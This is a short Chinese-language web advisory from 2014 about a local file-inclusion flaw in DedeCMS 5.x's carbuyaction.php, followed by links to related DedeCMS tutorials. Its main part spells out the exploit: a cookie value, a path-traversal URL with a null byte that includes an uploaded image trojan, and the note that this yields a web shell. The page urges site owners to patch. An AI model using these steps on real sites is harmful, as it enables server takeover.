Dedecms中一个重大漏洞文件carbuyaction.php,请注意修复
时间:2014-11-20使用过DEDECMS的人,可能很多都知道了这个漏洞,在DEDECMS5.X版本中,这个文件漏洞一直存在,文件如下: 漏洞文件carbuyaction.php
- 首先利用cookie修改工具,加上 code=alipay 然后访问
- http://www.xxx.com/plus/carbuyaction.php?dopost=return&code=../../uploads/userup/xx/myface.gif%00
- 直接包含成功
- 利用条件为GPC OFF ,或者某些环境下的截断。
- 可以在会员中心里上传个图片木马进行拿shell。
- 还可以包含dede自身文件进行更多利用,这里就不详细了。
现在最新版的DEDECMS5.7已经修复了这个错误,如果是早起的版本DEDECMS请用最新版文件覆盖即可
相关文章
DEDECMS根据栏目ID调用不同的列表代码标签方法在DEDECMS中,在同一个列表中,如何根据不同的栏目ID号,返回不同的列表调用样式。 比如在频道栏目1中,我们有栏目ID为1,2,3的三个栏目,那么我们如何在频道列表- Dedecms5.7任意调整水印在图片的位置教程在使用DEDECMS过程中,本站发现,开启DEDECMS水印功能后,后台虽然有9个位置可以选择水印的位置,但是无论哪个位置都是系统设置好的固定位置,比如我想让水印图
- 修改Dedecms织梦留言板内容为空时自动跳回留言板本站使用DEDECMS给不少单位制作了企业网站,我们知道,企业网站中在线留言是很需要的一个功能, DEDECMS确实也能提供这个功能,但是通过使用发现,我们在使用留
- Dedecms5.7删除文章自动删除文章里面的图片和缩略图教程最近本站在删除一些原来的垃圾文章时发现,虽然我删除了dedecms中的文章文字内容,但是在附件中的文章里面的图片并不会自动删除,这样就造成了服务器空间的极度
- Dedecms5.7调用最热搜索关键词标签(新加标签)最近不少朋友咨询本站,在DEDECMS模板中,如何在搜索框的下面,调用出最热的最近搜索关键词。 经过本站测试,在原来我们一般都是调用的最热TAG标签词,而不是关
修改Dedecms后台增加RSS和百度PING功能通过对百度近期的一系列的公告的研究,我们需要注意到两个问题,一个是百度Sitemap工具开通第一轮邀请测试,Sitemap工具可以帮助网站改善了收录问题;另一个是原
织梦如何快速搬家到新的服务器或者空间dedecms搬家详细说明 因为不同虚拟主机空间的mysql数据库名称是各不相同的(因为其前缀不一样的,用过就知道了), 所以要首先备份数据库,然后放到新空间还原,再重新生成ht
织梦dedecms注册会员列表常用sql分析用过织梦dedecms的人都知道,织梦会员系统相当强大,跟论坛程序差不多,对于使用会员系统的人来说,织梦系统足够用的了,但是,有时候,织梦系统很多的地方又不是我们所希